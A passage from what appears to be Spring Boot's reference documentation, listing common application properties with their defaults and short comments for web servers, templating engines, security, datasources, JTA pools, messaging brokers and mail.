({sc-spring-boot-autoconfigure}\/web\/ServerProperties.{sc-ext}[ServerProperties])\n\tserver.port=8080\n\tserver.address= # bind to a specific NIC\n\tserver.compression.enabled=false # if response compression is enabled\n\tserver.compression.mime-types=text\/html,text\/xml,text\/plain,text\/css # comma-separated list of MIME types that should be compressed\n\tserver.compression.min-response-size=2048 # minimum response size that is required for compression to be performed\n\tserver.context-parameters.*= # Servlet context init parameters, e.g. server.context-parameters.a=alpha\n\tserver.context-path= # the context path, defaults to '\/'\n\tserver.jsp-servlet.class-name=org.apache.jasper.servlet.JspServlet # The class name of the JSP servlet\n\tserver.jsp-servlet.init-parameters.*= # Init parameters used to configure the JSP servlet\n\tserver.jsp-servlet.registered=true # Whether or not the JSP servlet is registered\n\tserver.servlet-path= # the servlet path, defaults to '\/'\n\tserver.display-name= # the display name of the application\n\tserver.session.timeout= # session timeout in seconds\n\tserver.session.tracking-modes= # tracking modes (one or more of \"cookie\" ,\"url\", \"ssl\")\n\tserver.session.cookie.name= # session cookie name\n\tserver.session.cookie.domain= # domain for the session cookie\n\tserver.session.cookie.path= # path of the session cookie\n\tserver.session.cookie.comment= # comment for the session cookie\n\tserver.session.cookie.http-only= # \"HttpOnly\" flag for the session cookie\n\tserver.session.cookie.secure= # \"Secure\" flag for the session cookie\n\tserver.session.cookie.max-age= # maximum age of the session cookie in seconds\n\tserver.ssl.enabled=true # if SSL support is enabled\n\tserver.ssl.client-auth= # want or need\n\tserver.ssl.key-alias=\n\tserver.ssl.ciphers= # supported SSL ciphers\n\tserver.ssl.key-password=\n\tserver.ssl.key-store=\n\tserver.ssl.key-store-password=\n\tserver.ssl.key-store-provider=\n\tserver.ssl.key-store-type=\n\tserver.ssl.protocol=TLS\n\tserver.ssl.trust-store=\n\tserver.ssl.trust-store-password=\n\tserver.ssl.trust-store-provider=\n\tserver.ssl.trust-store-type=\n\tserver.tomcat.access-log-pattern= # log pattern of the access log\n\tserver.tomcat.access-log-enabled=false # is access logging enabled\n\tserver.tomcat.internal-proxies=10\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}|\\\\\n\t\t\t192\\\\.168\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}|\\\\\n\t\t\t169\\\\.254\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}|\\\\\n\t\t\t127\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}|\\\\\n\t\t\t172\\\\.1[6-9]{1}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}|\\\\\n\t\t\t172\\\\.2[0-9]{1}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}|\\\\\n\t\t\t172\\\\.3[0-1]{1}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3} # regular expression matching trusted IP addresses\n\tserver.tomcat.protocol-header=x-forwarded-proto # front end proxy forward header\n\tserver.tomcat.protocol-header-https-value=https # value of the protocol header that indicates that the incoming request uses SSL\n\tserver.tomcat.port-header= # front end proxy port header\n\tserver.tomcat.remote-ip-header=x-forwarded-for\n\tserver.tomcat.basedir=\/tmp # base dir (usually not needed, defaults to tmp)\n\tserver.tomcat.background-processor-delay=30; # in seconds\n\tserver.tomcat.max-http-header-size= # maximum size in bytes of the HTTP message header\n\tserver.tomcat.max-threads = 0 # number of threads in protocol handler\n\tserver.tomcat.uri-encoding = UTF-8 # character encoding to use for URL decoding\n\tserver.undertow.access-log-enabled=false # if access logging is enabled\n\tserver.undertow.access-log-pattern=common # log pattern of the access log\n\tserver.undertow.access-log-dir=logs # access logs directory\n\tserver.undertow.buffer-size= # size of each buffer in bytes\n server.undertow.buffers-per-region= # number of buffer per region\n server.undertow.direct-buffers=false # allocate buffers outside the Java heap\n server.undertow.io-threads= # number of I\/O threads to create for the worker\n server.undertow.worker-threads= # number of worker threads\n\n\t# SPRING MVC ({sc-spring-boot-autoconfigure}\/web\/WebMvcProperties.{sc-ext}[WebMvcProperties])\n\tspring.mvc.locale= # set fixed locale, e.g. en_UK\n\tspring.mvc.date-format= # set fixed date format, e.g. dd\/MM\/yyyy\n\tspring.mvc.favicon.enabled=true\n\tspring.mvc.message-codes-resolver-format= # PREFIX_ERROR_CODE \/ POSTFIX_ERROR_CODE\n\tspring.mvc.ignore-default-model-on-redirect=true # if the the content of the \"default\" model should be ignored redirects\n\tspring.mvc.async.request-timeout= # async request timeout in milliseconds\n\tspring.mvc.view.prefix= # MVC view prefix\n\tspring.mvc.view.suffix= # ... and suffix\n\n\t# SPRING RESOURCES HANDLING ({sc-spring-boot-autoconfigure}\/web\/ResourceProperties.{sc-ext}[ResourceProperties])\n\tspring.resources.cache-period= # cache timeouts in headers sent to browser\n\tspring.resources.add-mappings=true # if default mappings should be added\n\tspring.resources.static-locations= # comma-separated list of the locations that serve static content (e.g. 'classpath:\/resources\/')\n\tspring.resources.chain.enabled=false # enable the Spring Resource Handling chain (enabled automatically if at least a strategy is enabled)\n\tspring.resources.chain.cache=false # enable in-memory caching of resource resolution\n\tspring.resources.chain.html-application-cache=false # enable HTML5 appcache manifest rewriting\n\tspring.resources.chain.strategy.content.enabled=false # enable a content version strategy\n\tspring.resources.chain.strategy.content.paths= # comma-separated list of regular expression patterns to apply the version strategy to\n\tspring.resources.chain.strategy.fixed.enabled=false # enable a fixed version strategy\n\tspring.resources.chain.strategy.fixed.paths= # comma-separated list of regular expression patterns to apply the version strategy to\n\tspring.resources.chain.strategy.fixed.version= # version string to use for this version strategy\n\n\t# MULTIPART ({sc-spring-boot-autoconfigure}\/web\/MultipartProperties.{sc-ext}[MultipartProperties])\n\tmultipart.enabled=true\n\tmultipart.file-size-threshold=0 # Threshold after which files will be written to disk.\n\tmultipart.location= # Intermediate location of uploaded files.\n\tmultipart.max-file-size=1Mb # Max file size.\n\tmultipart.max-request-size=10Mb # Max request size.\n\n\t# SPRING HATEOAS ({sc-spring-boot-autoconfigure}\/hateoas\/HateoasProperties.{sc-ext}[HateoasProperties])\n\tspring.hateoas.apply-to-primary-object-mapper=true # if the primary mapper should also be configured\n\n\t# HTTP encoding ({sc-spring-boot-autoconfigure}\/web\/HttpEncodingProperties.{sc-ext}[HttpEncodingProperties])\n\tspring.http.encoding.charset=UTF-8 # the encoding of HTTP requests\/responses\n\tspring.http.encoding.enabled=true # enable http encoding support\n\tspring.http.encoding.force=true # force the configured encoding\n\n\t# HTTP message conversion\n\tspring.http.converters.preferred-json-mapper= # the preferred JSON mapper to use for HTTP message conversion. Set to \"gson\" to force the use of Gson when both it and Jackson are on the classpath.\n\n\t# JACKSON ({sc-spring-boot-autoconfigure}\/jackson\/JacksonProperties.{sc-ext}[JacksonProperties])\n\tspring.jackson.date-format= # Date format string (e.g. yyyy-MM-dd HH:mm:ss), or a fully-qualified date format class name (e.g. com.fasterxml.jackson.databind.util.ISO8601DateFormat)\n\tspring.jackson.property-naming-strategy= # One of the constants on Jackson's PropertyNamingStrategy (e.g. CAMEL_CASE_TO_LOWER_CASE_WITH_UNDERSCORES) or the fully-qualified class name of a PropertyNamingStrategy subclass\n\tspring.jackson.deserialization.*= # see Jackson's DeserializationFeature\n\tspring.jackson.generator.*= # see Jackson's JsonGenerator.Feature\n\tspring.jackson.joda-date-time-format= # Joda date time format string\n\tspring.jackson.mapper.*= # see Jackson's MapperFeature\n\tspring.jackson.parser.*= # see Jackson's JsonParser.Feature\n\tspring.jackson.serialization.*= # see Jackson's SerializationFeature\n\tspring.jackson.serialization-inclusion= # Controls the inclusion of properties during serialization (see Jackson's JsonInclude.Include)\n\n\t# THYMELEAF ({sc-spring-boot-autoconfigure}\/thymeleaf\/ThymeleafAutoConfiguration.{sc-ext}[ThymeleafAutoConfiguration])\n\tspring.thymeleaf.check-template-location=true\n\tspring.thymeleaf.prefix=classpath:\/templates\/\n\tspring.thymeleaf.excluded-view-names= # comma-separated list of view names that should be excluded from resolution\n\tspring.thymeleaf.view-names= # comma-separated list of view names that can be resolved\n\tspring.thymeleaf.suffix=.html\n\tspring.thymeleaf.mode=HTML5\n\tspring.thymeleaf.enabled=true # enable MVC view resolution\n\tspring.thymeleaf.encoding=UTF-8\n\tspring.thymeleaf.content-type=text\/html # ;charset=<encoding> is added\n\tspring.thymeleaf.cache=true # set to false for hot refresh\n\n\t# FREEMARKER ({sc-spring-boot-autoconfigure}\/freemarker\/FreeMarkerAutoConfiguration.{sc-ext}[FreeMarkerAutoConfiguration])\n\tspring.freemarker.allow-request-override=false\n\tspring.freemarker.cache=true\n\tspring.freemarker.check-template-location=true\n\tspring.freemarker.charset=UTF-8\n\tspring.freemarker.content-type=text\/html\n\tspring.freemarker.enabled=true # enable MVC view resolution\n\tspring.freemarker.expose-request-attributes=false\n\tspring.freemarker.expose-session-attributes=false\n\tspring.freemarker.expose-spring-macro-helpers=false\n\tspring.freemarker.prefix=\n\tspring.freemarker.prefer-file-system-access=true # prefer file system access for template loading\n\tspring.freemarker.request-context-attribute=\n\tspring.freemarker.settings.*=\n\tspring.freemarker.suffix=.ftl\n\tspring.freemarker.template-loader-path=classpath:\/templates\/ # comma-separated list\n\tspring.freemarker.view-names= # whitelist of view names that can be resolved\n\n\t# GROOVY TEMPLATES ({sc-spring-boot-autoconfigure}\/groovy\/template\/GroovyTemplateAutoConfiguration.{sc-ext}[GroovyTemplateAutoConfiguration])\n\tspring.groovy.template.cache=true\n\tspring.groovy.template.charset=UTF-8\n\tspring.groovy.template.check-template-location=true # check that the templates location exists\n\tspring.groovy.template.configuration.*= # See GroovyMarkupConfigurer\n\tspring.groovy.template.content-type=text\/html\n\tspring.groovy.template.enabled=true # enable MVC view resolution\n\tspring.groovy.template.prefix=\n\tspring.groovy.template.resource-loader-path=classpath:\/templates\/\n spring.groovy.template.suffix=.tpl\n\tspring.groovy.template.view-names= # whitelist of view names that can be resolved\n\n\t# VELOCITY TEMPLATES ({sc-spring-boot-autoconfigure}\/velocity\/VelocityAutoConfiguration.{sc-ext}[VelocityAutoConfiguration])\n\tspring.velocity.allow-request-override=false\n\tspring.velocity.cache=true\n\tspring.velocity.check-template-location=true\n\tspring.velocity.charset=UTF-8\n\tspring.velocity.content-type=text\/html\n\tspring.velocity.date-tool-attribute=\n\tspring.velocity.enabled=true # enable MVC view resolution\n\tspring.velocity.expose-request-attributes=false\n\tspring.velocity.expose-session-attributes=false\n\tspring.velocity.expose-spring-macro-helpers=false\n\tspring.velocity.number-tool-attribute=\n\tspring.velocity.prefer-file-system-access=true # prefer file system access for template loading\n\tspring.velocity.prefix=\n\tspring.velocity.properties.*=\n\tspring.velocity.request-context-attribute=\n\tspring.velocity.resource-loader-path=classpath:\/templates\/\n\tspring.velocity.suffix=.vm\n\tspring.velocity.toolbox-config-location= # velocity Toolbox config location, for example \"\/WEB-INF\/toolbox.xml\"\n\tspring.velocity.view-names= # whitelist of view names that can be resolved\n\n\t# MUSTACHE TEMPLATES ({sc-spring-boot-autoconfigure}\/mustache\/MustacheAutoConfiguration.{sc-ext}[MustacheAutoConfiguration])\n\tspring.mustache.cache=true\n\tspring.mustache.charset=UTF-8\n\tspring.mustache.check-template-location=true\n\tspring.mustache.content-type=UTF-8\n\tspring.mustache.enabled=true # enable MVC view resolution\n\tspring.mustache.prefix=\n\tspring.mustache.suffix=.html\n\tspring.mustache.view-names= # whitelist of view names that can be resolved\n\n\t# JERSEY ({sc-spring-boot-autoconfigure}}\/jersey\/JerseyProperties.{sc-ext}[JerseyProperties])\n\tspring.jersey.type=servlet # servlet or filter\n\tspring.jersey.init= # init params\n\tspring.jersey.filter.order=\n\n\t# INTERNATIONALIZATION ({sc-spring-boot-autoconfigure}\/MessageSourceAutoConfiguration.{sc-ext}[MessageSourceAutoConfiguration])\n\tspring.messages.basename=messages\n\tspring.messages.cache-seconds=-1\n\tspring.messages.encoding=UTF-8\n\n\t[[common-application-properties-security]]\n\t# SECURITY ({sc-spring-boot-autoconfigure}\/security\/SecurityProperties.{sc-ext}[SecurityProperties])\n\tsecurity.user.name=user # login username\n\tsecurity.user.password= # login password\n\tsecurity.user.role=USER # role assigned to the user\n\tsecurity.require-ssl=false # advanced settings ...\n\tsecurity.enable-csrf=false\n\tsecurity.basic.enabled=true\n\tsecurity.basic.realm=Spring\n\tsecurity.basic.path= # \/**\n\tsecurity.basic.authorize-mode= # ROLE, AUTHENTICATED, NONE\n\tsecurity.filter-order=0\n\tsecurity.headers.xss=false\n\tsecurity.headers.cache=false\n\tsecurity.headers.frame=false\n\tsecurity.headers.content-type=false\n\tsecurity.headers.hsts=all # none \/ domain \/ all\n\tsecurity.sessions=stateless # always \/ never \/ if_required \/ stateless\n\tsecurity.ignored= # Comma-separated list of paths to exclude from the default secured paths\n\n\t# SECURITY OAUTH2 CLIENT ({sc-spring-boot-autoconfigure}\/security\/oauth2\/OAuth2ClientProperties.{sc-ext}[OAuth2ClientProperties]\n\tsecurity.oauth2.client.client-id= # OAuth2 client id\n security.oauth2.client.client-secret= # OAuth2 client secret. A random secret is generated by default\n\n # SECURITY OAUTH2 SSO ({sc-spring-boot-autoconfigure}\/security\/oauth2\/client\/OAuth2SsoProperties.{sc-ext}[OAuth2SsoProperties]\n security.oauth2.sso.filter-order= # Filter order to apply if not providing an explicit WebSecurityConfigurerAdapter\n security.oauth2.sso.login-path= # Path to the login page, i.e. the one that triggers the redirect to the OAuth2 Authorization Server\n\n\t# DATASOURCE ({sc-spring-boot-autoconfigure}\/jdbc\/DataSourceAutoConfiguration.{sc-ext}[DataSourceAutoConfiguration] & {sc-spring-boot-autoconfigure}\/jdbc\/DataSourceProperties.{sc-ext}[DataSourceProperties])\n\tspring.datasource.name= # name of the data source\n\tspring.datasource.initialize=true # populate using data.sql\n\tspring.datasource.schema= # a schema (DDL) script resource reference\n\tspring.datasource.data= # a data (DML) script resource reference\n\tspring.datasource.sql-script-encoding= # a charset for reading SQL scripts\n\tspring.datasource.platform= # the platform to use in the schema resource (schema-${platform}.sql)\n\tspring.datasource.continue-on-error=false # continue even if can't be initialized\n\tspring.datasource.separator=; # statement separator in SQL initialization scripts\n\tspring.datasource.driver-class-name= # JDBC Settings...\n\tspring.datasource.url=\n\tspring.datasource.username=\n\tspring.datasource.password=\n\tspring.datasource.jndi-name= # For JNDI lookup (class, url, username & password are ignored when set)\n\tspring.datasource.max-active=100 # Advanced configuration...\n\tspring.datasource.max-idle=8\n\tspring.datasource.min-idle=8\n\tspring.datasource.initial-size=10\n\tspring.datasource.validation-query=\n\tspring.datasource.test-on-borrow=false\n\tspring.datasource.test-on-return=false\n\tspring.datasource.test-while-idle=\n\tspring.datasource.time-between-eviction-runs-millis=\n\tspring.datasource.min-evictable-idle-time-millis=\n\tspring.datasource.max-wait=\n\tspring.datasource.jmx-enabled=false # Export JMX MBeans (if supported)\n\n\t# DAO ({sc-spring-boot-autoconfigure}\/dao\/PersistenceExceptionTranslationAutoConfiguration.{sc-ext}[PersistenceExceptionTranslationAutoConfiguration])\n\tspring.dao.exceptiontranslation.enabled=true\n\n\t# MONGODB ({sc-spring-boot-autoconfigure}\/mongo\/MongoProperties.{sc-ext}[MongoProperties])\n\tspring.data.mongodb.host= # the db host\n\tspring.data.mongodb.port=27017 # the connection port (defaults to 27107)\n\tspring.data.mongodb.uri=mongodb:\/\/localhost\/test # connection URL\n\tspring.data.mongodb.database=\n\tspring.data.mongodb.authentication-database=\n\tspring.data.mongodb.grid-fs-database=\n\tspring.data.mongodb.username=\n\tspring.data.mongodb.password=\n\tspring.data.mongodb.repositories.enabled=true # if spring data repository support is enabled\n\tspring.data.mongodb.field-naming-strategy= # fully qualified name of the FieldNamingStrategy to use\n\n\t# JPA ({sc-spring-boot-autoconfigure}\/orm\/jpa\/JpaBaseConfiguration.{sc-ext}[JpaBaseConfiguration], {sc-spring-boot-autoconfigure}\/orm\/jpa\/HibernateJpaAutoConfiguration.{sc-ext}[HibernateJpaAutoConfiguration])\n\tspring.jpa.properties.*= # properties to set on the JPA connection\n\tspring.jpa.open-in-view=true\n\tspring.jpa.show-sql=true\n\tspring.jpa.database-platform=\n\tspring.jpa.database=\n\tspring.jpa.generate-ddl=false # ignored by Hibernate, might be useful for other vendors\n\tspring.jpa.hibernate.naming-strategy= # naming classname\n\tspring.jpa.hibernate.ddl-auto= # defaults to create-drop for embedded dbs\n\tspring.data.jpa.repositories.enabled=true # if spring data repository support is enabled\n\n\t# JTA ({sc-spring-boot-autoconfigure}\/transaction\/jta\/JtaAutoConfiguration.{sc-ext}[JtaAutoConfiguration])\n\tspring.jta.log-dir= # transaction log dir\n\tspring.jta.*= # technology specific configuration\n\n\t# JOOQ ({sc-spring-boot-autoconfigure}\/jooq\/JooqAutoConfiguration.{sc-ext}[JooqAutoConfiguration])\n\tspring.jooq.sql-dialect=\n\n\t# ATOMIKOS\n\tspring.jta.atomikos.connectionfactory.borrow-connection-timeout=30 # Timeout, in seconds, for borrowing connections from the pool\n\tspring.jta.atomikos.connectionfactory.ignore-session-transacted-flag=true # Whether or not to ignore the transacted flag when creating session\n\tspring.jta.atomikos.connectionfactory.local-transaction-mode=false # Whether or not local transactions are desired\n\tspring.jta.atomikos.connectionfactory.maintenance-interval=60 # The time, in seconds, between runs of the pool's maintenance thread\n\tspring.jta.atomikos.connectionfactory.max-idle-time=60 # The time, in seconds, after which connections are cleaned up from the pool\n\tspring.jta.atomikos.connectionfactory.max-lifetime=0 # The time, in seconds, that a connection can be pooled for before being destroyed. 0 denotes no limit.\n\tspring.jta.atomikos.connectionfactory.max-pool-size=1 # The maximum size of the pool\n\tspring.jta.atomikos.connectionfactory.min-pool-size=1 # The minimum size of the pool\n\tspring.jta.atomikos.connectionfactory.reap-timeout=0 # The reap timeout, in seconds, for borrowed connections. 0 denotes no limit.\n\tspring.jta.atomikos.connectionfactory.unique-resource-name=jmsConnectionFactory # The unique name used to identify the resource during recovery\n\tspring.jta.atomikos.datasource.borrow-connection-timeout=30 # Timeout, in seconds, for borrowing connections from the pool\n\tspring.jta.atomikos.datasource.default-isolation-level= # Default isolation level of connections provided by the pool\n\tspring.jta.atomikos.datasource.login-timeout= # Timeout, in seconds, for establishing a database connection\n\tspring.jta.atomikos.datasource.maintenance-interval=60 # The time, in seconds, between runs of the pool's maintenance thread\n\tspring.jta.atomikos.datasource.max-idle-time=60 # The time, in seconds, after which connections are cleaned up from the pool\n\tspring.jta.atomikos.datasource.max-lifetime=0 # The time, in seconds, that a connection can be pooled for before being destroyed. 0 denotes no limit.\n\tspring.jta.atomikos.datasource.max-pool-size=1 # The maximum size of the pool\n\tspring.jta.atomikos.datasource.min-pool-size=1 # The minimum size of the pool\n\tspring.jta.atomikos.datasource.reap-timeout=0 # The reap timeout, in seconds, for borrowed connections. 0 denotes no limit.\n\tspring.jta.atomikos.datasource.test-query= # SQL query or statement used to validate a connection before returning it\n\tspring.jta.atomikos.datasource.unique-resource-name=dataSource # The unique name used to identify the resource during recovery\n\n\t# BITRONIX\n\tspring.jta.bitronix.connectionfactory.acquire-increment=1 # Number of connections to create when growing the pool\n\tspring.jta.bitronix.connectionfactory.acquisition-interval=1 # Time, in seconds, to wait before trying to acquire a connection again after an invalid connection was acquired\n\tspring.jta.bitronix.connectionfactory.acquisition-timeout=30 # Timeout, in seconds, for acquiring connections from the pool\n\tspring.jta.bitronix.connectionfactory.allow-local-transactions=true # Whether or not the transaction manager should allow mixing XA and non-XA transactions\n\tspring.jta.bitronix.connectionfactory.apply-transaction-timeout=false # Whether or not the transaction timeout should be set on the XAResource when it is enlisted\n\tspring.jta.bitronix.connectionfactory.automatic-enlisting-enabled=true # Whether or not resources should be enlisted and delisted automatically\n\tspring.jta.bitronix.connectionfactory.cache-producers-consumers=true # Whether or not produces and consumers should be cached\n\tspring.jta.bitronix.connectionfactory.defer-connection-release=true # Whether or not the provider can run many transactions on the same connection and supports transaction interleaving\n\tspring.jta.bitronix.connectionfactory.ignore-recovery-failures=false # Whether or not recovery failures should be ignored\n\tspring.jta.bitronix.connectionfactory.max-idle-time=60 # The time, in seconds, after which connections are cleaned up from the pool\n\tspring.jta.bitronix.connectionfactory.max-pool-size=10 # The maximum size of the pool. 0 denotes no limit\n\tspring.jta.bitronix.connectionfactory.min-pool-size=0 # The minimum size of the pool\n\tspring.jta.bitronix.connectionfactory.password= # The password to use to connect to the JMS provider\n\tspring.jta.bitronix.connectionfactory.share-transaction-connections=false # Whether or not connections in the ACCESSIBLE state can be shared within the context of a transaction\n\tspring.jta.bitronix.connectionfactory.test-connections=true # Whether or not connections should be tested when acquired from the pool\n\tspring.jta.bitronix.connectionfactory.two-pc-ordering-position=1 # The postion that this resource should take during two-phase commit (always first is Integer.MIN_VALUE, always last is Integer.MAX_VALUE)\n\tspring.jta.bitronix.connectionfactory.unique-name=jmsConnectionFactory # The unique name used to identify the resource during recovery\n\tspring.jta.bitronix.connectionfactory.use-tm-join=true Whether or not TMJOIN should be used when starting XAResources\n\tspring.jta.bitronix.connectionfactory.user= # The user to use to connect to the JMS provider\n\tspring.jta.bitronix.datasource.acquire-increment=1 # Number of connections to create when growing the pool\n\tspring.jta.bitronix.datasource.acquisition-interval=1 # Time, in seconds, to wait before trying to acquire a connection again after an invalid connection was acquired\n\tspring.jta.bitronix.datasource.acquisition-timeout=30 # Timeout, in seconds, for acquiring connections from the pool\n\tspring.jta.bitronix.datasource.allow-local-transactions=true # Whether or not the transaction manager should allow mixing XA and non-XA transactions\n\tspring.jta.bitronix.datasource.apply-transaction-timeout=false # Whether or not the transaction timeout should be set on the XAResource when it is enlisted\n\tspring.jta.bitronix.datasource.automatic-enlisting-enabled=true # Whether or not resources should be enlisted and delisted automatically\n\tspring.jta.bitronix.datasource.cursor-holdability= # The default cursor holdability for connections\n\tspring.jta.bitronix.datasource.defer-connection-release=true # Whether or not the database can run many transactions on the same connection and supports transaction interleaving\n\tspring.jta.bitronix.datasource.enable-jdbc4-connection-test= # Whether or not Connection.isValid() is called when acquiring a connection from the pool\n\tspring.jta.bitronix.datasource.ignore-recovery-failures=false # Whether or not recovery failures should be ignored\n\tspring.jta.bitronix.datasource.isolation-level= # The default isolation level for connections\n\tspring.jta.bitronix.datasource.local-auto-commit= # The default auto-commit mode for local transactions\n\tspring.jta.bitronix.datasource.login-timeout= # Timeout, in seconds, for establishing a database connection\n\tspring.jta.bitronix.datasource.max-idle-time=60 # The time, in seconds, after which connections are cleaned up from the pool\n\tspring.jta.bitronix.datasource.max-pool-size=10 # The maximum size of the pool. 0 denotes no limit\n\tspring.jta.bitronix.datasource.min-pool-size=0 # The minimum size of the pool\n\tspring.jta.bitronix.datasource.prepared-statement-cache-size=0 # The target size of the prepared statement cache. 0 disables the cache\n\tspring.jta.bitronix.datasource.share-transaction-connections=false # Whether or not connections in the ACCESSIBLE state can be shared within the context of a transaction\n\tspring.jta.bitronix.datasource.test-query= # SQL query or statement used to validate a connection before returning it\n\tspring.jta.bitronix.datasource.two-pc-ordering-position=1 # The position that this resource should take during two-phase commit (always first is Integer.MIN_VALUE, always last is Integer.MAX_VALUE)\n\tspring.jta.bitronix.datasource.unique-name=dataSource # The unique name used to identify the resource during recovery\n\tspring.jta.bitronix.datasource.use-tm-join=true Whether or not TMJOIN should be used when starting XAResources\n\n\t# SOLR ({sc-spring-boot-autoconfigure}\/solr\/SolrProperties.{sc-ext}[SolrProperties])\n\tspring.data.solr.host=http:\/\/127.0.0.1:8983\/solr\n\tspring.data.solr.zk-host=\n\tspring.data.solr.repositories.enabled=true # if spring data repository support is enabled\n\n\t# ELASTICSEARCH ({sc-spring-boot-autoconfigure}\/elasticsearch\/ElasticsearchProperties.{sc-ext}[ElasticsearchProperties])\n\tspring.data.elasticsearch.cluster-name= # The cluster name (defaults to elasticsearch)\n\tspring.data.elasticsearch.cluster-nodes= # The address(es) of the server node (comma-separated; if not specified starts a client node)\n\tspring.data.elasticsearch.properties.*= # Additional properties used to configure the client\n\tspring.data.elasticsearch.repositories.enabled=true # if spring data repository support is enabled\n\n\t# DATA REST ({spring-data-rest-javadoc}\/core\/config\/RepositoryRestConfiguration.{dc-ext}[RepositoryRestConfiguration])\n\tspring.data.rest.base-path= # base path against which the exporter should calculate its links\n\n\t# FLYWAY ({sc-spring-boot-autoconfigure}\/flyway\/FlywayProperties.{sc-ext}[FlywayProperties])\n\tflyway.*= # Any public property available on the auto-configured `Flyway` object\n\tflyway.check-location=false # check that migration scripts location exists\n\tflyway.locations=classpath:db\/migration # locations of migrations scripts\n\tflyway.schemas= # schemas to update\n\tflyway.init-version= 1 # version to start migration\n\tflyway.init-sqls= # SQL statements to execute to initialize a connection immediately after obtaining it\n\tflyway.sql-migration-prefix=V\n\tflyway.sql-migration-suffix=.sql\n\tflyway.enabled=true\n\tflyway.url= # JDBC url if you want Flyway to create its own DataSource\n\tflyway.user= # JDBC username if you want Flyway to create its own DataSource\n\tflyway.password= # JDBC password if you want Flyway to create its own DataSource\n\n\t# LIQUIBASE ({sc-spring-boot-autoconfigure}\/liquibase\/LiquibaseProperties.{sc-ext}[LiquibaseProperties])\n\tliquibase.change-log=classpath:\/db\/changelog\/db.changelog-master.yaml\n\tliquibase.check-change-log-location=true # check the change log location exists\n\tliquibase.contexts= # runtime contexts to use\n\tliquibase.default-schema= # default database schema to use\n\tliquibase.drop-first=false\n\tliquibase.enabled=true\n\tliquibase.url= # specific JDBC url (if not set the default datasource is used)\n\tliquibase.user= # user name for liquibase.url\n\tliquibase.password= # password for liquibase.url\n\n\t# JMX\n\tspring.jmx.default-domain= # JMX domain name\n\tspring.jmx.enabled=true # Expose MBeans from Spring\n\tspring.jmx.server=mbeanServer # MBeanServer bean name\n\n\t# RABBIT ({sc-spring-boot-autoconfigure}\/amqp\/RabbitProperties.{sc-ext}[RabbitProperties])\n\tspring.rabbitmq.addresses= # connection addresses (e.g. myhost:9999,otherhost:1111)\n\tspring.rabbitmq.dynamic=true # create an AmqpAdmin bean\n\tspring.rabbitmq.host= # connection host\n\tspring.rabbitmq.port= # connection port\n\tspring.rabbitmq.password= # login password\n\tspring.rabbitmq.requested-heartbeat= # requested heartbeat timeout, in seconds; zero for none\n\tspring.rabbitmq.ssl.enabled=false # enable SSL support\n\tspring.rabbitmq.ssl.key-store= # path to the key store that holds the SSL certificate\n\tspring.rabbitmq.ssl.key-store-password= # password used to access the key store\n\tspring.rabbitmq.ssl.trust-store= # trust store that holds SSL certificates\n\tspring.rabbitmq.ssl.trust-store-password= # password used to access the trust store\n\tspring.rabbitmq.username= # login user\n\tspring.rabbitmq.virtual-host= # virtual host to use when connecting to the broker\n\n\t# REDIS ({sc-spring-boot-autoconfigure}\/redis\/RedisProperties.{sc-ext}[RedisProperties])\n\tspring.redis.database= # database name\n\tspring.redis.host=localhost # server host\n\tspring.redis.password= # server password\n\tspring.redis.port=6379 # connection port\n\tspring.redis.pool.max-idle=8 # pool settings ...\n\tspring.redis.pool.min-idle=0\n\tspring.redis.pool.max-active=8\n\tspring.redis.pool.max-wait=-1\n\tspring.redis.sentinel.master= # name of Redis server\n\tspring.redis.sentinel.nodes= # comma-separated list of host:port pairs\n\tspring.redis.timeout= # connection timeout in milliseconds\n\n\t# ACTIVEMQ ({sc-spring-boot-autoconfigure}\/jms\/activemq\/ActiveMQProperties.{sc-ext}[ActiveMQProperties])\n\tspring.activemq.broker-url=tcp:\/\/localhost:61616 # connection URL\n\tspring.activemq.user=\n\tspring.activemq.password=\n\tspring.activemq.in-memory=true # broker kind to create if no broker-url is specified\n\tspring.activemq.pooled=false\n\n\t# ARTEMIS ({sc-spring-boot-autoconfigure}\/jms\/artemis\/ArtemisProperties.{sc-ext}[ArtemisProperties])\n\tspring.artemis.mode= # connection mode (native, embedded)\n\tspring.artemis.host=localhost # hornetQ host (native mode)\n\tspring.artemis.port=5445 # hornetQ port (native mode)\n\tspring.artemis.embedded.enabled=true # if the embedded server is enabled (needs hornetq-jms-server.jar)\n\tspring.artemis.embedded.server-id= # auto-generated id of the embedded server (integer)\n\tspring.artemis.embedded.persistent=false # message persistence\n\tspring.artemis.embedded.data-directory= # location of data content (when persistence is enabled)\n\tspring.artemis.embedded.queues= # comma-separated queues to create on startup\n\tspring.artemis.embedded.topics= # comma-separated topics to create on startup\n\tspring.artemis.embedded.cluster-password= # customer password (randomly generated by default)\n\n\t# HORNETQ ({sc-spring-boot-autoconfigure}\/jms\/hornetq\/HornetQProperties.{sc-ext}[HornetQProperties])\n\tspring.hornetq.mode= # connection mode (native, embedded)\n\tspring.hornetq.host=localhost # hornetQ host (native mode)\n\tspring.hornetq.port=5445 # hornetQ port (native mode)\n\tspring.hornetq.embedded.enabled=true # if the embedded server is enabled (needs hornetq-jms-server.jar)\n\tspring.hornetq.embedded.server-id= # auto-generated id of the embedded server (integer)\n\tspring.hornetq.embedded.persistent=false # message persistence\n\tspring.hornetq.embedded.data-directory= # location of data content (when persistence is enabled)\n\tspring.hornetq.embedded.queues= # comma-separated queues to create on startup\n\tspring.hornetq.embedded.topics= # comma-separated topics to create on startup\n\tspring.hornetq.embedded.cluster-password= # customer password (randomly generated by default)\n\n\t# JMS ({sc-spring-boot-autoconfigure}\/jms\/JmsProperties.{sc-ext}[JmsProperties])\n\tspring.jms.jndi-name= # JNDI location of a JMS ConnectionFactory\n\tspring.jms.pub-sub-domain= # false for queue (default), true for topic\n\n\t# Email ({sc-spring-boot-autoconfigure}\/mail\/MailProperties.{sc-ext}[MailProperties])\n\tspring.mail.host=smtp.acme.org # mail server host\n\tspring.mail.port= # mail server port\n\tspring.mail.username=\n\tspring.mail.password=\n\tspring.mail.default-encoding=UTF-8 # encoding to use for MimeMessages\n\tspring.mail.properties.*= # properties to set on the JavaMail session\n\tspring.mail.jndi-name= # JNDI location of a Mail Session\n\tspring.mail.test-connection=false # Test that the mail server is available on startup\n\n\t# SPRING 